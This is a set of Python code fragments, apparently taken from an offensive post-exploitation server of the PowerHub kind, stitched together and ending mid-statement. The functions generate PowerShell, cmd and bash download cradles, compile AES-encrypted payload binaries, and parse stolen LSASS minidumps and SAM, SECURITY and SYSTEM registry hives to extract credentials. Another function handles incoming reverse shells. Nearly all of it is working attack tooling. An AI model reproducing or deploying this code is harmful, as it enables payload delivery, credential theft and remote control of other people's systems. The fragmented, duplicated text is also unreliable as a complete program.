def dlcradle(): try: if request.args['Launcher'] in [ 'powershell', 'cmd', 'cmd_enc', 'bash', ]: cmd = build_cradle(request.args) return render_template( "hub/download-cradle.html", dl_str=cmd, ) else: import urllib href = urllib.parse.urlencode(request.args) return render_template( "hub/download-cradle.html", dl_str=None, href='/dl?' + href, ) except BadRequestKeyError as e: log.error("Unknown key, must be one of %s" % str(list(request.args.keys()))) return (str(e), 500)
def compile_source(args, source_file, compile_cmd, formatter): filename = create_filename(args) args = dict(args) # convert from immutable dict args['Launcher'] = 'cmd_enc' cmd = build_cradle(args) size = len(cmd) key = generate_random_key(16) cmd = encrypt_aes(cmd.encode(), key) c_code = load_template( source_file, CMD=formatter(cmd), LEN_CMD=size, KEY=key, ) with tempfile.TemporaryDirectory() as tmpdirname: outfile = os.path.join(tmpdirname, 'powerhub.out') infile = os.path.join(tmpdirname, 'powerhub.in') with open(infile, 'w') as f: f.write(c_code) pipe = subprocess.Popen( compile_cmd(outfile) + [infile], stdin=subprocess.PIPE, stdout=subprocess.PIPE, ) out = pipe.communicate() if pipe.returncode == 0: with open(outfile, 'rb') as f: result = f.read() else: raise RuntimeError('Compiling the payload failed, ' 'see console output') log.error('Compiling the payload failed: ' + out) return filename, result
def decrypt_hive(loot_id): """Decrypt the registry hive and store result in DB""" loot = get_loot_entry(loot_id) try: from pypykatz.registry.offline_parser import OffineRegistry o = OffineRegistry() try: o = o.from_files( loot.system_file, security_path=loot.security_file, sam_path=loot.sam_file, software_path=loot.software_file, ) except TypeError: # 'system' is not here yet, no biggie return None loot.hive = o.to_json() _db.session.commit() log.debug("Hive decrypted - %s" % loot_id) except ImportError as e: log.error("You have unmet dependencies, loot could not be processed") log.exception(e)
def parse_sysinfo(sysinfo): if not sysinfo: return {} try: return json.loads(sysinfo) except Exception as e: log.error("Error while parsing sysinfo") log.exception(e) return {}
def init_db(self): try: from flask_sqlalchemy import SQLAlchemy from powerhub.sql import init_db db = SQLAlchemy(self.flask_app) init_db(db) except ImportError as e: log.error("You have unmet dependencies, " "database will not be available") log.exception(e) db = None self.db = db
def __init__(self, body, packet_type=T_BSON): if packet_type == T_BSON: try: self._dict = bson.loads(body) except Exception: log.error("Could not decipher shell packet") log.debug(body) self._dict = {} elif packet_type == T_DICT: self._dict = body else: raise Exception if "data" not in self._dict: self._dict["data"] = "" self.delivered = False
def save_loot(file, loot_id, encrypted=False): """Process the loot file""" filename = save_file(file, dir=LOOT_DIR, encrypted=encrypted) loot_type = get_loot_type(filename) try: if loot_type == "DMP": from pypykatz.pypykatz import pypykatz mimi = pypykatz.parse_minidump_file(filename) creds = [ json.loads(v.to_json()) for _, v in mimi.logon_sessions.items() ] store_minidump(loot_id, json.dumps(creds), filename) elif loot_type == "SYSINFO": add_sysinfo(loot_id, filename) else: # registry hive add_hive(loot_id, loot_type, filename) except ImportError as e: log.error("You have unmet dependencies, loot could not be processed") log.exception(e)
def run_provider(self, host='127.0.0.1', port=18157): """Provides a service where you can interact with caught shells""" self.lsock.bind((host, port)) self.lsock.listen(128) while True: connection, addr = self.lsock.accept() r, _, _ = select.select([connection], [], []) id = connection.recv(8).decode() if not id: break peer_shell = [s for s in self.shells if s.details["id"] == id] if id == "g" * 8 and self.shells: peer_shell = [self.shells[-1]] if not peer_shell: log.error("No shell with ID %s found" % id) connection.close() continue peer_shell[0].set_lsock(connection) log.info("%s - %s - Connected local and reverse shell" % ( addr[0], peer_shell[0].details["id"], ))
def dlcradle(): try: return build_cradle(request.args, flavor=request.args["flavor"]) except BadRequestKeyError as e: log.error("Unknown key, must be one of %s" % str(request.args)) return (str(e), 500)
app = Flask(__name__) app.wsgi_app = ProxyFix(app.wsgi_app, x_proto=1, x_host=1, x_port=1) app.config.update( DEBUG=args.DEBUG, SECRET_KEY=os.urandom(16), SQLALCHEMY_DATABASE_URI='sqlite:///' + DB_FILENAME, SQLALCHEMY_TRACK_MODIFICATIONS=False, ) try: from flask_sqlalchemy import SQLAlchemy db = SQLAlchemy(app) init_db(db) except ImportError as e: log.error("You have unmet dependencies, database will not be available") log.exception(e) db = None cb = get_clipboard() socketio = SocketIO( app, async_mode="threading", cors_allowed_origins=[ "http://%s:%d" % ( args.URI_HOST, args.LPORT, ), "https://%s:%d" % ( args.URI_HOST, args.SSL_PORT,